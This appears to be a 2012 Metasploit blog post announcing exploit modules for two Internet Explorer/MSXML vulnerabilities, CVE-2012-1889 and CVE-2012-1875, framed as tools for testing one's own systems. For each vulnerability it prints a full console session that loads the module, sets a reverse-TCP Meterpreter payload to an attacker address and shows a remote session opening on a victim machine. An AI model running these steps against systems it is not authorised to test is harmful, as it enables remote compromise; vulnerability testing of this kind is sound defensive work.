We've been noticing a lot of exploit activities against Microsoft vulnerabilities lately. We decided to look into some of these attacks, and released two modules for CVE-2012-1889 and CVE-2012-1875 within a week of the vulnerabilities' publication for our users to test their systems. Please note that both are very important to any organization using Windows, because one of them is a newly patched bug, while the other is still a zero-day. To test if any systems on your network are vulnerable, you can download the latest version of Metasploit for free.

CVE-2012-1889: MSXML Uninitialized Memory Corruption

This is an uninitialized memory bug found in MSXML. According to Microsoft, such a component can be loaded from either Internet Explorer and Microsoft Office. This vulnerability is rumored to be "state-sponsored", and what makes it really critical is it's still an 0-day hijacking Gmail accounts. That's right, that means if you're using Gmail as well as Internet Explorer or Microsoft Office, you're at risk. We expect this vulnerability to grow even more dangerous since there's no patch, and it's rather easy to trigger. There is a temporary mitigation from Microsoft by disabling the component and other config tweaks, but obviously, that has its limitations. Your best bet may be to use a different browser such as Google Chrome until an official patch is available.

Here's how you can check with Metasploit if any systems on your network are vulnerable, which is very likely since there is no patch available yet:
msf > use exploit/windows/browser/msxml_get_definition_code_exec
msf  exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(msxml_get_definition_code_exec) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf  exploit(msxml_get_definition_code_exec) > exploit
Exploit running as background job.
Started reverse handler on 10.0.1.3:4444
Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb
msf  exploit(msxml_get_definition_code_exec) >
  Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb
Server started.
10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP
10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
Sending stage (752128 bytes) to 10.0.1.79
Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500
Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (2856)
Spawning notepad.exe process to migrate to
[+] Migrating to 2356
[+] Successfully migrated to process

CVE-2012-1875: Internet Explorer Same ID Use-After-Free

This is a vulnerability found in the way Internet Explorer handles the same ID property, which accesses a deleted object and results in remote code execution. This has been exploited in the wild, possibly originating from Hong Kong. According to AlienVault Labs, the command-and-control server (C&C) is still active at the time of this writing. The Metasploit module shares some similarities with the one found in the wild -- they both bypass DEP/ASLR, use msvcr71.dll, and they both target common systems such as Windows XP and Windows 7. Multiple anti-virus vendors already have a quick check for this exploit. However, AVs cannot be used to patch bugs, so we still recommend you to try the Metasploit module anyway to verify if you are still indeed vulnerable.

To use this module, simply do the following:
msf > use exploit/windows/browser/ms12_037_same_id
msf  exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms12_037_same_id) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf  exploit(ms12_037_same_id) > exploit
Exploit running as background job.
Started reverse handler on 10.0.1.3:4444
Using URL: http://0.0.0.0:8080/gTHJEKBboMi
  Local IP: http://10.0.1.3:8080/gTHJEKBboMi
Server started.
msf  exploit(ms12_037_same_id) >
10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi
10.0.1.79        ms12_037_same_id - Using msvcrt ROP
10.0.1.79        ms12_037_same_id - Sending html
Sending stage (752128 bytes) to 10.0.1.79
Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (3916)
Spawning notepad.exe process to migrate to
[+] Migrating to 1680
[+] Successfully migrated to process

If you have any questions, let us know in the comments section.  To obtain the latest version of Metasploit for free, please go to: http://www.metasploit.com/download/